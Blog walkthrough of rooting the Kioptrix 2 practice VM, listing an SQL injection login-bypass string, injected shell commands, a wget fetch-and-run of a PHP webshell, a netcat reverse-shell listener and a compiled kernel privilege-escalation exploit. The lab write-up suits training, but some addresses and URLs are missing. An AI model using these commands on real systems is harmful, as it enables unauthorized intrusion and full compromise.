Rooting Kioptrix 2 Walkthrough


Kioptrix 2 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Vulnerabilities Exploited:

  • SQL Injection
  • Command Execution
  • Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root

Reconnaissance/ Scanning


Target VM IP Address:

nmap -p- -A –webxml -oX nmap-kioptrix2.xml

Nmap findings:

Found website is running on port 80.


Found sql injection in website.

“admin’ or 1=1 — -”


Found command execution. Our goal is to upload webshell. We need to find utility that will download our webshell, either wget, nc, etc… and a writable direcotyr.; pwd; ls -al; id; whereis wget

wget is available on server. We can use wget to download webshell over server. but we can not upload webshell in /var/ww/html? coz, this directory is owned by root, and everyone does not have access to write to this directory. No problem, we can use /tmp for webshell uploading with this command.

#; wget -O /tmp/shell.php; php /tmp/shell.php

But before executing above command in lets configure webshell with reverse ip address to our kali linux machine and start web server as:

#service apache2 start

and also, nc listener

#nc -nvlp 1234

execute command

Received interactive shell.

Privilege Escalation

Lets check operating system and kernel version, and check if any exploit is available.

I dont know, why each character is typed 2 times 😦

Search through exploitdb found exploit for centos 4.5

Move to exploit directory and start SimpleHTTPServer python module as:

#cd /usr/share/exploitdb/exploits/linux_x86/local/

#python -m SimpleHTTPServer 8888

and on target VM download exploit code,


#gcc 9542.c


Congrats! We are root!!!


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s